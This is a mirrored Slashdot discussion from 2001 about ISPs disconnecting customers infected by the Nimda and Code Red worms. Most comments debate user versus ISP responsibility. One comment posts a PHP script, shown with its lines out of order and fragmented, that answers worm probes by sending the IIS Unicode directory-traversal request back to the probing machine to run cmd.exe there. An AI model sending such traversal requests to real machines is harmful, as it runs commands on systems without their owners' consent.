Slashdot Mirror
Shutting Down Worm-Infected Broadband Users
disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
Why is it an ISPs job to have any concern over what's passing across the wires? They are just packets and that should be that. If users wish to run systems which are configured to respond in a particular way to particular requests on port 80, that's the users' business.
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying. As the poster said, users should be responsible for their own systems.
-- Ed Avis ed@membled.com
Free Mac Mini
Microsoft will never fix the problem without making sure people have to pay a monthly subscription
I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.
Yes its the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) on his box getting hacked. If you're on the net, its you responibility to stay safe.
http://twitter.com/onion2k
Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users.
Confuse users? Bah! They get confused well enough on their own!
My major issue with blocking ports is that, well, no ISP should! An ISP provides internet connectivity, and that's what they should do.
Yes, I agree they should have some say so over what traffic comes and goes over their network (i.e. no spam, DoS attacks, etc), but I myself would not give any ISP my business if I knew they were making choices about which ports I can or can not use.
I think they are doing the right thing by booting infected users. It's certainly better than any form of port blocking.
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
"I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. "
I think the huge underlying problem is that a) people do *not* know their box is infected and b) if they do know, they have no idea what to do about it. Don't forget, most people are very timid and lack any basic knowledge regarding computers. All they know how to do, is double click on the word2k icon, or outlook, or whatnot.
S.t.e.v.e.
Surely if a user is infected, the ISP could cut them off from the world but still allow them access to an internal ftp site with had patches to fix the problem?
what, like this one
but what use is a firewall against this?
If you are running IIS as your webserver you let port 80 through the firewall and into IIS and thus expose yourself.
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
I was just asking someone why ISPs don't do this. Why should the subnet I'm get get punished because of users who don't know what they're doing. Obviously they're going to call tech support and then get a quick lesson on how to download and install an MS patch.
I'd rather have the infected parties make some effort instead of the AT&T approach of just closing port 80 and letting the ignorant go unenlightened.
New slogan? Patches are the new killer app!
"many hi-speed companies ACTIVELY DISCOURAGE YOU from setting up your own firewall"
:)
Mine didn't. Mine provided pointers to Zone Alarm for windoze users and said that security was the user's own problem in the nice little handbook they gave me. Then again, mine's in the UK so doesn't have to pander to the Great Unwashed just yet..
(Of course, it doesn't help that the guy they sent round to install it saw `zsh, spodzone 18:03 #' and asked `is that windows 2k then?', but at least it left me free to do the obvious with dhcp instead
~Tim
--
Rushing on down to the circle of the turn
Turning off people's connection is rude. Asking a 75 year old senior citizen, who is just happy to read a few web pages and send mail to his grandkids to keep up an endless stream of patches because a bunch of hackers can disrupt the net is backwards.
Why? Internet access isn't a right, just like (despite what your average American might think) driving a car is not a right. If you want access to the internet (a peer to peer network) its your problem to make sure you don't have a broken setup that will annoy people. In other words your part of the bargin is not to do anything that will break the network, its your responsibility. Having a broken web server that gets infected by the latest worm is breaking the bargin.
Al.The Daily ACK - Eclectic posts by yet another hacker
It takes care of the thousands running IIS without meaning to, those people who didn't really notice the checked box while they were installing WinNT/2K. Increases the likelihood that someone who has a world-accessible webserver *knows* they have a world-accessible webserver, cause they had to expressly do something to make it happen.
"That's Tron. He fights for the Users."
Yeah you really know the score about NIMDA dont you.
You can get Nimda about seven different ways and 6 of them have nothing to do with running a web server. Just browsing an infected site, something beyond your control, with IE 5.5 sp1 or less was enough.
I'm still working on a clever footer.
That is, uhm, stupid. Why would you shut down port 80 for infected machines? To prevent them from being infected twice? Shutting down port 80 for vulnerable machines is more sensible, but how do you tell them from the well-patched servers? Blocking ports isn't meant to be a punishment, it's supposed to be a preventive measure.
Seriously with the FBI et al up to their kiesters running carnivore and echelon stuff do we realy want to let the ignorant clog up the net with malicious traffic? Just that much more traffic for them to sort through before they let our ligit traffic pass. We can piss and moan about civil liberties all we want, but the powers that be are going to do everything in their power to get the terrs, and letting them send out diversonary traffic isn't going to help. I just hope what they're doing doesnt get so illegal that they blow thier case out of the water.
Actualy I'm suprised, this is the first thing I've seen on the web, that has mentioned sept 11 and viri ect. that has stayed up for more than a few seconds anyways.
Apocalypse Cancelled, Sorry, No Ticket Refunds
If you knew anything about Nimda you would realize that you can get infected from simply reading an e-mail using an older version of Outlook, or browsing a web page using an older (but not that old) version of IE.
I'm still working on a clever footer.
I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant distregard of basic sysadmin responsibilies: how long has CodeRed been known about now?
However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infect machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.
It would take some setting up initially, but would reap substantial rewards in the long run.
| What, you were expecting
-O_O- +---- something witty?
I _have_ been doing something to help people who "just want a PC" and don't have the wherewithal to to deal with constant security threats, patches, and attacks:
I'm setting them all up with Macs.
For all the (often justified) grief that Apple gets for their pricing, a low-end iMac is a nice home PC with a lot of functionality, a good software bundle, and MacOS 9.x is all but hack-proof.
It solves the home user problem nicely.
-- Josh Turiel
"2. Do not eat iPod Shuffle."
Sorry. Apache is more prevalent than IIS.
Remember Code Blue a week or so ago? The one that affected Apache/Unix users? The media called it the "Code Red" of the Unix world. What happened with it? Nothing. Most systems were secured against it by default.
Nimbda affected more systems in 10 minutes than Code Blue did in the past week.
Learning HOW to think is more important than learning WHAT to think.
Those affected should welcome this kind of action. After all, the internet provider is closing a backdoor for the customer. That backdoor (FULL system access!) would otherwise keep announcing itself to the world.
Bollocks.
If you get cracked, it's through your own silly fault. If that's because you believed M$loth and/or got the impression that installing software was a zero-maintenance task, you deserve what you get.
And don't try to play the 75-yo sympathy game, either, the rules are just the same: you get your box cracked, you're responsible for it scanning & spreading to other sites, end of story.
~Tim
--
Rushing on down to the circle of the turn
Yes, most @homes specifically say you can't run servers in their AUPs, although DSL ISPs (and some @homes) typically let you run servers to your heart's content. However, one real advantage that blocking port 80 WOULD have is denying the ability to access the backdoors created by nimda / code red on those machines.
this worm is particularly nasty. it's really made my work week, that much is for sure.
...to NTBugTraq? Do they even service pack their server or workstation? The answer is: no not everyone. The information required to be a good MS product admin is there, you just need to get it. If you're a legit microsoft product owner it ought to be required that you get a digest format of their advisories in e-mail weekly. (An even better question is: how many of these IIS servers are properly licensed ???)
...Both, in my estimation. While I agree that it is the responsibility of the user to keep themselves patched, ISPs monitor network traffic, they can easily pay attention when a known high risk virus or worm is flooding their network.
in response to the growing storm regarding users vs ISPs... (/me dons his asbestos shorts)
yes users are responsible for their systems, they are responsible for watching patch levels, they are responsible for watching out for vulnerabilities. So many people throw up an IIS server or what-have-you on their DSL/Cable line it's not funny. Do you think all of them are subscribed to microsoft's Security advisory list?
And for those of you that thought I was beating on the users hard up there...Yes it is the responsibility (nay, the duty) of the ISPs to protect their networks, and by mission of action the internet. I run apache as my webserver of choice, my logs flooded with attempts to find CMD.EXE and ROOT.EXE in all the right MS places tuesday night and into wednesday morning. A veritable denial of service attack. Here's the kicker: I'm on a dynamic IP! (nice about the randomization of searching in this worm...) Many requests were coming from my own ISPs network. Do you think they responded when I e-mailed them? no, they didn't.
A good ISP shuts off a user who (knowingly or unknowingly) abuses their connection. What if this worm were more malicious? What if it caused data loss? Think of the liability that could impose, so'n'so's unpatched web server infected my unpatched webserver and blew away my e-commerce site. Who takes the blame? so'n'so? or so'n'so's ISP?
Don't even get me started on why worm/virus writers should be sending their exploits to anti-virus companies or other proper organizations instead of releasing them into the wild.
My ISP (Road Runner) suggested it verbally and pointed out in the TOS they also recommend one for users.
Learning HOW to think is more important than learning WHAT to think.
I've had almost 25,000 incoming port 80 requests since this virus was unleashed. (That's with my Linux box running constantly.) It's nice to see an ISP doing something productive.
To the naysayers, I'd like to point out that they aren't punishing people; just making them call to get their access back and make sure they're not infected. Remember, the bandwidth belongs to the ISP. They have to protect it.
I wish BellSouth would do something similar, but they've always been clueless. Heck, many of these requests were from BellSouth servers!
Road Runner in Central Florida has done the same thing. Don't know if it includes the rest of the country.
:-)
At first I didn't know if they'd blocked just me, to stop the constant flood of email from my auto-notifier
There's a lot of damn stupid people in the world...heck, I've met several people who run NT or 2K Server at home...I ask them why...they say "it's more powerful!" I'm reminded of those moments in Baseketball when the evil rich guy, when confronted with an example of supreme stupidity, holds his hands to his head as if in great pain.
Heck, I've even met people who are convince that, to do simple SMB filesharing, you *have* to have Server, workstation "can't do it". Total BS, but when has that ever stopped anyone believing something.
"That's Tron. He fights for the Users."
Getting it from a site won't make your system start broadcasting out for other sites. That ONLY happens when an IIS box gets infected.
So no one would care if your non-IIS workstation was infected...the only person with the problem would be you.
Oh, that's just pathetic.... You would only use the "but what about the elderly and the children" argument to drum up emotion when you have no other logical argument. To respond in kind, what about the other 75 year old senior citizens who have a clean computer and can't read web pages or send mail to their grandkids because the network is so flooded that they can't get anything through. Do you think they'll understand why this "dang new-fangled contraption ain't workin'?"
I'm not a cold-hearted person, but you've got to look at the facts. Shutting down these connections is pretty much the only way to make sure people will clean up their machines. You can't forget that the Code Red II virus, and presumably nimda as well, opens up a nice little hole that can be used to turn your machine into a Zombie. If the zombies get used, an ISP will have machines on their network attacking corporate and government computer systems. That's an absolutely *massive* liability there, especially since it can be proved that the ISP was aware of the infected machines and did pretty much nothing to eliminate the problem.
The best idea I've seen yet is the one to set up a "private" network for the infecting machines and direct them there. For those ISP's that don't want that expense, maybe offering to send them a CD with the patches and instructions in the mail for a reasonable fee would be a better alternative.
GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
AT&T Broadband's modem leasing agreement clearly states that you can run a http or ftp server.
Free Mac Mini
Yes it sucks, yes it's unfair and yes you'll probably have to pay fixe times your normal price to have it enabled but it'll deter those people who have no need to run a web server (ie. those who don't realise they're even running a web server) and will make the DSL providers life a little easier.
You'll see.
Avantslash - View Slashdot cleanly on your mobile phone.
but they are running IIS Which isn't a free web server, they should have paid plenty of $ to run it
Actually, IIS is entirely free. Or at least it comes built into Windows 2000 and 98, and is downloadable for free for NT and 95.
My Journal
Our campus was affected rather badly by Nimda, and as a result the students were cut off from the network to make sure that they weren't infecting or being infected by the worm. The outage only lasted as long as it took McAfee to distribute the cleaning agent for it.
If you have cancer, you cut it out, right?
It's not unwelcome nannying, it's a necessary precaution. You do what you have to do to ensure that you maintain your level of service.
I haven't done it myself, but I seem to remember reading somewhere that a particular version of Samba was the first to introduce domain controller functionality.
l
Actually, here's some info on that: http://bioserve.latrobe.edu.au/samba/ntdomfaq.htm
I should try this out sometime...it would make the Windows boxes on the home network play a little nicer, I think...don't particularly want to waste a box with NT or 2K Server, but I've already got a handful of boxes running Samba...might as well use them to their full potential.
"That's Tron. He fights for the Users."
In this time of knee-jerk reactions to terrifying disasters, this warning seems richly appropriate.
I pay for DSL, i can run *WHATEVER* i want on it. Saying "tough beans" is a little short sighted.
/. this week... NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS.
If, on the other hand, they would like to have me charged me (as in contact the RCMP or %your_local_federal_police%) for cracking i would 'understand'... the rule of law is always the highest order, to simply make endless arrays of rules in contracts - and force people to abide by them (least they go without(be martyrs)) then why have Law? Why have Legislature? Corporate COntracts for all manner of 'things' are creaping into every crack of life. These "contracts" force people to give up their rights in order to exist in a corporate controlled world... think IM nuts? go read some of the EULA discussed on
This isnt exactly a 'cut and dry' issue, these contracts basically allow, arbitrary 'for the greater good' decisions to be made by the DSL providers... I know that their TOS probably say "no bandwidth hogging servers" but, when ALL DSL is provided under the same TOS it becomes a method for DSL providers to make decisions about what I may - and may not - run on my box. I pay for bandwidth, allowing them to decided what data i may send and rec oversteps the bounds on my 'RIPE FOR ABUSE' meter.
Think of the Censorship analogy - if they can censor some speech, then they are only an 'arbitrary decision' away from censoring *YOUR* speech. Whats to stop them from saying "you cannot download streaming OGG because there is no publisher-protection-scheme built it, and you may be violating copyright...
again, i may sound a bit unreasonable, or maybe paranoid, OBVIOUSLY I am not saying we want to allow these worms to run, but we must be weary of 'seemingly' reasonable decisions when made by 'powerful' (plutocratic) people.
They want to run this stupid MS Windoze OS, likely it's pirated anyhow(ever met someone who BOUGHT windows? I haven't), and then they're also too cheap to keep up with paying for Virus software to keep their ShitBox running. If everybody was forced to PAY for windoze, and then they had to go out and BUY additional software so windoze will continue to run, they'd all format and install Linux. I think the new XP is GREAT!!! the anti-piracy feature will surely get many to leave the darkside and join us in our quest for world domination. Shut them down and report them to the link below for Piracy from MS.
"The Most Fun Possible on 4 wheels" is at SunBuggy in Las Vegas
There are three feasible alternatives which high-speed ISPs could take that I can see:
- Leave it alone, and maybe warn clients that they are infected. However, clients will probably get infected faster than they can fix their systems, especially those who don't even know what a web server is.
- Block incoming traffic on port 80 to all clients. Affects all of your clients, even those that are and will not be infected, and most likely gets you a bunch of angry users (which are those who know what they're doing anyway, the ones that ISPs like least).
- Temporarily disable access to the infected clients. You can be SURE you will hear from them VERY soon after their cable modem stops working. This also affects only clients that ARE infected, and is quite easy to automate. If the virus causes so much problems, then I think it's only fair that clients who have compromised systems be disconnected until they fix them.
I was a Videotron cable client until they started "handling" Code Red. Their solution was to suddenly block all incoming traffic to port 80 at their router, which, needless to say, is tough luck for my personal web server. I moved it to another port, but it took me a while to realize it was being blocked, since they did not inform anyone of their new restrictions. That measure has been "temporary" for nearly two months now, and the number of code red infected clients has not dropped. More recently they started blocking incoming traffic on port 25 to all of their cable clients, to "prevent clients from sending spam". That was the last straw, and I switched providers.
"I remember Y1K, every abacus had to get another bead"
When a Win98 or NT Workstation (not running IIS) gets infected via an exploited web site, does that workstation start broadcasting out? Or do the workstations just pass the .eml files over the network hoping to infect another IIS system?
"FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer."
Free Mac Mini
-- ;-)
Kuro5hin.org: where the good times never end.
i work for a major webhosting company and when the first code-red wave hit our customer's unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.
however, most of our customers basically ignored our repeated warnings to patch their servers properly and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months and the patches required to fix these issues had been released by M$ for almost a year. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.
i give up.
Using a computer is a lot like driving a car, from the point of view of responsibility taken. A normal PC is like some family wagon: relatively cheap, quick and quite safe. Running a web-server is a lot like driving an 18-wheeler.
A person who runs a web server has to defend himself fromm all the security risks that he might face, exactly in the same way as a truck driver has to maintain his brake system. Of course, one can get along driving a truck without tuning it all but then what can protect him from wet slopes in stormy weather?
Lots of people install a web server either because they don't bother to look at what they install, or because they think it cool. But web servers are not children's toys; if people aren't aware of the harm they're causing, they must be stopped.
I live in Israel. In the last few days I've been getting quite a lot of internal ISP trafic bound to my port 80 (luckily I run Apache and a firewall). Many of the people from whose IPs (dial-up!) I've been getting connections haven't even bothered to shut down their FTP servers (which were of course MS-FTP). Those morons deserve to be thrown out.
Well DUH! Helping people is really nice, but if you'd read the article, the point is that the ISP's haven't been able to get in touch with people! The intent here is NOT to slap people around for being stupid, but to get their attention!! This sh-t has been going on for months now. I say it's about time the ISP's get proactive and start forcing people to wake up and clean up their systems!!!
Your Servant, B. Baggins
Great email. I'm glad providers are finally taking a stand. If these machines have still not been patched after 2 months of publicity, they never will. The only way you are going to get it done is to kick these people off the net until they do it. It takes some balls to do this, as these idiots are also the type who will call and throw a huge fit claiming that their machines are perfectly fine. I wouldn't want to be in customer service, but I'm glad their doing it for the betterment of the net.
"The guide is definitive, reality is frequently inaccurate."
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying.
I hope this is a troll, but I fear it is not.
If I leave the fence to my pool open, and my neighbor's kid walks in, falls into the pool, and drowns himself, I am liable not only for civil but also for criminal damages. If my dog gets loose and injures someone, I am also liable. Why, then, if my computer damages others' machines on the internet, should I not be liable for damages?
What I think needs to happen is this: Any owner of an infected netblock needs to be assessed a charge if their computers damage or disrupt traffic on the Internet. The fines should be commensurate with the amount of damage caused. If I'm a major ISP and I own a large netblock that's affected (even if I sell parts of that netblock off), it should be my responsibility to track down the sources of that disturbance within my network and eradicate it, otherwise I should be punished.
I no longer have any tolerance whatsoever for lazy or complacent admins; fines may finally force people to wake the fuck up and secure their goddamned machines and their networks. I mean, come on! Nimda exploits holes in Windows NT and 2000 that are over six months old, and it's done a pretty damned good job of showing me that there are plenty of clueless admins out there! These admins need to be dealt with, they're making life hard for the rest of us.
You call it nannying. I call it being responsible.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS
Taco,
I generally look forward to your little comments appended to user submissions. However this is out of line. MS, regardless of how many people hate them, has released a patch for this. Its the users who have the problem. Not that MS is blameless, but calm down before you flame.
I know I'm going to get flamed for this, but Linux has its own security holes too, with plenty of script kiddies out there attempting to exploit them and root your system. The only difference is that the average sysadmin stays on top of things like this.
If 90% of users ran Linux, worms would be written to hit them, and the MS proponents over at seecolon.org would be laughing it up, whining about how Linus doesn't do enough QA, even though its the users fault.
As for shutting down broadband users who have the worm, this is pretty much the only thing you can do. You can't block outgoing traffic to port 80, or they would never be able to download any patches. They should turn them on for a temporary basis after they complain, say for 1 day, and give them the appropriate information to clean their system and install defenses. These guys are on broadband, so they can easily download any patch.
Anyway, thats enough ranting for me. Just remember, while MS is not blameless, think before you start flaming them.
Captain_Frisk
This is the same as win9x, macos, win2000 with users who run as administrator, and linux with users who run as root!
Those users choose to run as root. With XP, ActiveX controls on a web page will be able to run as root, without any knowledge of the user. Contents of emails will be able to run as root.
Thirdly, adding raw sockets is a very common add-on to windows and linux just to do these kinds of DoS attacks.
Yes, but you have to get enough access to add it on. With XP, you won't, anymore. It'll be a whole hell of a lot easier to do. As for Linux, the fact that you think it's an add-on speaks volumes as to whether you know what you're talking about.
It's up to the operating system to be able to *handle* badly formed data, not other OSes to protect it from it!
Name one operating system that can "handle" a massive distributed denial of service attack. I'm sure the entire industry is awaiting your answer with baited breath. What OS is on the other end means nothing when 10 pounds of shit is being rammed into a five-pound sack.
Steve's objection isn't to raw socket support. Raw socket support is available in every mature OS in existence that has TCP/IP support.
Steve's objection is to taking something that previously required priviledged access, and thus required a major break in security to get on machines you don't own, and making it suddenly available to unprivileged processes BY DEFAULT, making every Windows XP machine suddenly a hell of a lot easier to use as a DDoS platform, without breaking the security first.
Steve's second objection, and the one I was using as a case in point, is the fact that Microsoft doesn't just not understand the problem, they made it abundantly clear that they don't CARE whether or not it's a problem, because Marketing wants the feature, and Security is at best a tertiary consideration.
Nimda uses several attack vectors and not all of them involve an IIS. A machine infected by Nimda isn't necessarily running Win2K Server.
Ok.. So the Microsoft huge sales figures come from where?
Most of these people ARE likely to be legit users of IIS.
Unless you're a tech in the company in question, you'll never have access to the install disks (those, usually being locked in fireproof cabs, or held in the technical offices for most places I've worked).
Therefore, if it was a tech 'borrowing and installing' IIS for home use (DSL), they'd be much more likely to keep it patched, and know how to when they recieve the email. And a lot more likely to be checking.
This does reek of a home user who has no clue that it's installed, or how to remedy the problem.
Malk
"Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes."
1- Microsoft has already added a firewall into Windows XP, allowing users to block attackers.
2- Microsoft had patches for these exploits up months ago, for free. Internet Explorer semi-regularly forwards Windows users to an automatic website update that explains they need to patch their OS to install patches that fix problems, including security issues. It is not their fault that the users are directed right to an automated patch utility and CHOOSE TO IGNORE IT ANYWAY!
give credit where credit is due, please.
--
"It is now safe to switch off your computer."
The other day I received an e-mail from a relation of mine which was the SirCam virus in all it glory. Luckily for me I don't use or Windows or Outlook for my e-mail. I told them that they had a virus and that they should try sorting it out. They told me they ran their anti-virus and nothing was detected, so they let me know I was wrong (got to love relations ;). It was only when someone else told them the same thing they came back to me telling me dispite getting the latest anti-virus update nothing could be detected.
Not being in the same country I decided to find some help documents and e-mailed them the references. It was only after they told me they were still stuck that I realised that most of the documents were oriented towards techies and not towards your average Joe, who considers programming the video a nightmare. In the end I told them to either find someone they knew who was good with computers locally or ask their computer shop if they could resolve the problem.
So here is the problem, what is your average Joe meant to do when all the help is targeted at people who aren't technophobic? Unless this can be addressed infected computers are going to stay infected long after the fix is available.
Forgot to mention that my relations are using a 56K connection, in Europe where being connected costs money by the minute, so when your average OS patch is starting to exceed the 20Mb size, it is likely to make some people wonder whether the update is worth the effort.
Jumpstart the tartan drive.
So when are the authorities going to not only FIRE people for purching Msft products, but ARREST & PROSECUTE them for not patching and keeping them worm free and in general from pissing in the public pool? That's what I'd like to see since Msft wants to both 1) publish buggy and patch later 2) market their shiny baubles to the vast computer ignorant laity.
Similarly, there's a certain division of responsibility when someone buys a car - if there are defective parts that might threaten the safety of other drivers (such as tire blowouts), it's the mfg's responsibility to send out recall notices and fix it; but it's also the owners responsbility to operate the vehicle in a safe manner. What happens in the software licensing world is the mfg assumes *NO* responsibility, even for defects that might endanger data or other people's PC's via a network (info 'superhighway').
It gets really bizzare when you consider that software and all rights remains the property
of the authors & publishers, but responsibility for it's misdeeds & FU's are the poor suckers who fell for the slick ads, don't read or understand EULA's, pirate the stuff, etc. That's like GM leasing cars with defective brakes, and holding the operator responsible for all damages that occur when they fail after pulling onto an off ramp and crashing into a child care facility.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
Heh, my ISP is in the UK too.. :) He took away an ISO of Red Hat, and one of FreeBSD for when he was feeling a tad more adventurous. :)
When the Engineer came round to set up my Cable install, he told me I needed a Windows installation (after I told him that this was Linux, not a prettified windows) to set up the cable modem. When it came down to me having to pull a full tower case into a small room from another room in the flat, he asked if there was any way to just get a browser on the Linux box. So up came Mozilla, and he was just blown away with how easy it was to run. I left him tooling round on X for a while, and maybe we got a convert out of that.
Malk
I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"
/* Check to see if the connection actually opened */
/* URL-encode the message... */
/* ...and send it */
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
/usr/local/apache/httpd.conf, whatever it is) and put this type in like this:
.php .php3 .exe
/tmp/nimba.log.
<?php
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
if ($fp)
{
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
fputs ($fp, "GET
fclose ($fp);
}
/* for fun and confusion.. */
header ("HTTP/1.0 404");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
echo ("</body></html>\n");
echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>
Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?
Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf,
AddType application/x-httpd-php
Now restart Apache by issuing one of either:
/etc/rc.d/init.d/httpd restart
apachectl restart
That should do it, and you're going to have a logfile of all the people who have been warned in
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
Considering that the McAfee software is only going to remove known threats, it would be better to perform a data backup and reinstall the system software on an infected host-- who knows if McAfee missed something in the clean up? Better to get a clean copy running than a patched version of an infected copy, and then, before you put the clean system back on line, you take the necessary steps to prevent getting infected (like turning off IIS) while you obtain patches for the vulnerable services. Considering that these are residential accounts, there is no revenue to be lost from server downtime, right? And the host owner should take his/her time to do the job right.
I do not have a signature
This is true, of course. This worm spreads in a number of ways, all of which exploit security flaws in Microsoft software:
Notice a pattern there? Yes, that's right. If you don't run Microsoft, you can't get Nimda. Or Code Red, or Code Red II, or SirCam, or Melissa, or...
This isn't about being a Linux bigot. You can't get Nimda on MacOS. You can't get it on Solaris. You can't get in on OS/400, or AIX, or an Amiga, or on *BSD. This isn't a matter of Linux being good. Linux is just ordinary, like any other half-competent operating system.
This is a matter of Microsoft being incompetent. Hopelessly, culpably, irredeemably incompetent.
I'm old enough to remember when discussions on Slashdot were well informed.
(It's clear that they haven't completely shut down the ports, since I'm still able to connect to my server, but I've only got errors from a few unique IP addresses today. There's no way that many people could have cleaned up their own systems since yesterday...)
Your Servant, B. Baggins
How does that jibe with the following, from http://help.broadband.att.com/legal/violations.jsp ?
Interestingly, I can find no such clause forbidding redistribution in the leasing agreement that you quote (only a clause prohibiting *selling* services). But clearly they believe that running any kind of server is a violation. From http://help.broadband.att.com/faq.jsp?content_id=4 16&category_id=34:
That seems pretty clear to me! Perhaps the leasing agreement isn't the only agreement you're subject to (I notice they also have links to an "acceptable use policy", but they seem not to be accessible by non-AT&T users). In any case, I wouldn't want to have to be in the position of having to argue the point with them after they'd blocked port 80. If you want to run servers, go elsewhere if you have the choice. If that choice isn't exercised, it may eventually diseappear....
--J. Bruce Fields
People have commented that without an Internet connection, the problem will be hard to fix. Why? Because Microsoft requires infected and at-risk systems be on the Internet to download patches. If Microsoft had done the respectable thing and mailed out patch CDs to registered users (and maybe even given them away at computer stores), much of this could have been avoided.
Try changing your zip code to the same city as sone of us who is telling you that we're allowed to run servers - the help pages change based on where your service is coming from.
Try 32225 - Jacksonville, Florida. Formerly MediaOne Roadrunner. Then go look at the service agreements.
We're allowed to run servers, we just can't have AT&T support them.
This space for rent. Call 1-800-STEAK4U
Heh...it's definitely on the list of "things I'm gonna do on a weekend when I'm bored and don't feel like playing games". Just like building a PC for mp3 stereo/DivX player functionality, and getting a few more serial terminals (bathroom, bedroom, and kitchen need terminals, damnit! Screw "internet appliances" and crap like that...I want to always be less than 5 feet from a green-screen!).
That's right, I have no life....why do you ask?
"That's Tron. He fights for the Users."
I can see home users not knowing enough about computers to take the steps to protect themselves. Personally I think that Internet usage should be licensed and anyone unwilling or unable to qualify for the license should be relegated to AOL. Anyone claiming this view is elitist is obviously a candidate for such a fate.
And as far as the companies that post enormously inflated figures on how much these various E-Mail worms will cost them, I say they should go to their network security people and their CIO and ask them hard questions about why the necessary steps were not taken to prevent the outbreak inside the company in the first place. The exploit that Code Red used, for instance, had a patch out for ages before the worm start spreading. Of course, the reason the infrastructure monkeys don't do it is because a lot of them are idiots and the ones who aren't are so overwhelmed that they can barely keep up with other work demands. The CIO makes the decisions on how much staff is necessary to keep the networks not only running smoothly but safely and securely too and if he's not doing his job well, his bonus and possibly his job should be impacted.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
@HOME does not allow people to run web, mail, DNS, NNTP, etc. servers according to their TOS contract.
:) can just switch http over to port 81 or something.
Cox@Home in no.la.us has decided to just shut off ports 25 and 80 which is a Good Thing. That means that people who are unaware that they are running IIS on their winbox will have it disabled, and people who know they are running a webserver (against @HOME's TOS
I've been running my family home page off of @HOME for over a year, and they haven't bothered me about it, but I'm sure they would give me some grief if it was generating a lot of traffic.
/*drunk.. fix later*/
The simple solution is: Talk to customer support.
From what I hear with my ISP that does exactly this measure (dropping you offline after a warning, and you're infected), you talk to Customer Service, who let you back on, just to get the patch, you patch, and they check to see you disinfected (you can do rough disinfect pre patch).
That's what Customer Service are for. To let you back online, so you can keep paying them. But they don't want a few people ruining the show for everyone.
Malk
Relying on host features to prevent denial of service attacks is pointless - ISPs need to pull their finger out, and start doing filters that prevent source address spoofing. This will address the issue of raw sockets allowing such spoofing once and for all, across all OS types. Ever since it became possible to put a PC on the Internet, it has been a waste of time trying to rely on host security to prevent undesirable network behaviour.
The IIS exploit that Nimda used was reported in October of 2000 in MS00-078... Web Server Folder Traversal.
But it references actually having already been patched by MS00-057... File Permission Canonization which was released in August of 2000.
Both of these have been included in various other hotfixes moving forward, including rollup hotfixes thrown together to battle Code Red.
